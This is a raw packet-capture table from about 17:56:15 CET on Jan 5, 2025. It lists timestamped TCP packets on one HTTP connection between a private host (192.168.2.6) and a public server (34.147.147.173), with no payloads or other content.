Jan 5, 2025 17:56:15.218206882 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.218270063 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.218302965 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.218349934 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.218398094 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.218424082 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.218487024 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.218552113 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.218604088 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.218687057 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.218698025 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.218740940 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.218750000 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.218782902 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.222203970 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.222214937 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.222430944 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.222537994 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.222598076 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.222646952 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.222659111 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.222752094 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.223006010 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.223253012 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.223520041 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.223530054 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.223539114 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.223572016 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.223606110 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.223609924 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.223617077 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.223701954 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.223730087 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.223740101 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.223750114 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.223766088 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.223788023 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.223797083 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.223835945 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.223844051 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.223845005 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.223892927 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.223910093 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.223974943 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.223984957 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224036932 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224055052 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224071026 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224080086 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224104881 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224113941 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224200964 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224219084 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224236965 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224246025 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224262953 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224271059 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224291086 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224298954 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224320889 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224330902 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224339962 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224349022 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224445105 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224457026 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224471092 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224479914 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224503040 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224522114 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224544048 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224565029 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224576950 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224586010 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224601984 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224610090 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224634886 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224731922 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224843025 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224853039 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224863052 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.224872112 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228116035 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228127956 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228224993 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228266954 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228317976 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228327036 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228363991 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228384018 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228401899 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228405952 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.228410959 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228446960 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228456974 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228460073 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.228508949 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228518963 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228569984 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228601933 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228619099 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228641033 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228657007 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228666067 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228728056 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228737116 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228768110 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228776932 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228815079 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228823900 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228888035 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228905916 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228920937 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228939056 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228949070 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228956938 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.228992939 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229005098 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229022026 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229031086 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229074955 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229089022 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229105949 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229123116 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229130983 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229139090 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229162931 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229171038 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229202032 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229221106 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229235888 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229244947 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229276896 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229285955 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229315996 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229325056 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.229332924 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233306885 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233319044 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233352900 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233365059 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233378887 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233441114 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233449936 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233496904 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233505964 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233581066 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233588934 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233599901 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.233643055 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233656883 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233690023 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233699083 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233705044 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.233771086 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233781099 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233886957 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233896017 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233927965 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.233963966 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234091997 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234102011 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234146118 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234157085 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234179020 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234189034 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234232903 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234241962 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234270096 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234278917 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234309912 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234318018 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234345913 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234354019 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234390020 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234399080 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234471083 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234487057 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234503984 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234519958 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234548092 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234622955 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234661102 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234671116 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234699011 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234708071 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234761000 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234771013 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234778881 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234786034 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234803915 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.234812975 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238452911 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238472939 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238487959 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238504887 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238516092 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238583088 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238593102 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238620043 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238637924 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238665104 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238702059 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238711119 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238735914 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238744974 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238845110 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238853931 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238887072 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238895893 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238935947 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.238941908 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238951921 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238977909 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238987923 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.238990068 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.239027977 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239037991 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239067078 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239077091 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239110947 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239120007 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239149094 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239157915 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239172935 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239181042 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239212036 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239221096 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239252090 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239260912 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239288092 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239296913 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239346027 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239356041 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239392042 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239401102 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239411116 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239419937 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239449024 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239458084 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239480019 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239489079 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239558935 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239582062 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239600897 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239609003 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.239617109 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.243808985 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.243829012 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.243923903 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.243979931 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244028091 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244064093 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244072914 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244105101 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244115114 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244147062 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244168997 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.244265079 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244275093 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244303942 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244313002 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244368076 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244376898 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244497061 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244504929 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244559050 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244568110 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244652033 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244661093 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244714975 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244746923 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244779110 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244791985 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244801998 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244844913 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244935036 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244944096 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244956970 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.244971991 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245008945 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245017052 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245054960 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245064020 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245104074 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245111942 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245177984 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245187044 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245235920 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245244026 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245287895 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245296955 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245332956 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245345116 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245357990 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245433092 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245548010 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245558023 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245589018 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245596886 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.245634079 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249028921 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249140024 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249191999 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249289036 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249296904 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249394894 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249403954 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249412060 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249419928 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249435902 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249464035 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249483109 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249497890 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249512911 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249560118 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249569893 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249578953 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249588013 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249603033 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249615908 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249624014 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249651909 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249667883 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249682903 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249690056 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249731064 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249739885 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249823093 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249831915 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249869108 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249876976 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249949932 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249958992 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249974966 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.249983072 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.250008106 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.250016928 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.250044107 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.250052929 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.250061989 CET	80	49759	34.147.147.173	192.168.2.6
